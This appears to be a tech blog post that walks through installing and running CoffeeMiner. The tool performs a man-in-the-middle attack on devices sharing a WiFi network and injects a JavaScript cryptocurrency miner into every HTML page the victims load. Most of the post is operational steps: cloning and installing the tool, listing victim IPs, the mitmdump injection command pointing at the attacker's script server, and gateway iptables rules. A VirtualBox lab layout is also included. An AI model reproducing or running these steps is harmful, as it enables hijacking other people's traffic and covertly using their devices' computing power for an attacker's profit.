How To Use CoffeeMiner – WiFi MITM Cryptocurrency Mining Pool

Photo of Noor Qureshi Noor Qureshi Follow on Twitter January 10, 2018
How To Use CoffeeMiner - WiFi MITM Cryptocurrency Mining Pool

Cryptocurrency Miners are in rise from previous year, nearly 600 millions computers are continually mining cryptoCurrency through their browsers without user’s knowledge. But this CoffeeMiner works differently through intercepting traffic and route to injected HTML pages for mining, that HTML pages contains javascript that force all devices which are connected to WiFi network to mine cryptocurrency for an attacker.

Concept:

  • Performs a MITM attack to all selected victims
  • Injects a js script in all the HTML pages requested by the victims
  • The js script injected contains a cryptocurrency miner
  • All the devices victims connected to the Lan network, will be mining for the CoffeeMiner

How To Use CoffeeMiner – WiFi MITM Cryptocurrency Mining Pool

First, We’re going to Download or Git CoffeeMiner.

$ git clone https://github.com/arnaucode/coffeeMiner.git

After that we’re going to run ‘install.sh‘ bash file.

  • install.sh
$ bash install.sh
  • edit victims.txt with one IP per line
  • edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")

When everything’s completed, we’re simply going to execute and run that coffeeMiner.py file.

  • execute coffeeMiner.py
$ python3 coffeeMiner.py ipgateway

How To Use CoffeeMiner - WiFi MITM Cryptocurrency Mining Pool

Instructions to setup VirtualBox scenario

In each machine, remember to setup the dns server, for example, in /etc/resolv.conf:

nameserver 8.8.8.8

Victim

  • network adapter:
    • Host-only Adapter
  • /etc/network/interfaces:
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
    address 10.0.2.20
    netmask 255.255.255.0
    gateway 10.0.2.15

Attacker

  • network adapter:
    • Host-only Adapter
  • /etc/network/interfaces:
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
    address 10.0.2.10
    netmask 255.255.255.0
    gateway 10.0.2.15

Gateway

  • network adapter:
    • Bridged Adapter
    • Host-only Adapter
  • /etc/network/interfaces:
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp

auto eth1
iface eth1 inet static
    address 10.0.2.15
    netmask 255.255.255.0

Clean IPTABLES:

iptables --flush
iptables --table nat --flush

Configure the Gateway machine as a router:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT

Download CoffeeMiner

Back to top button
Close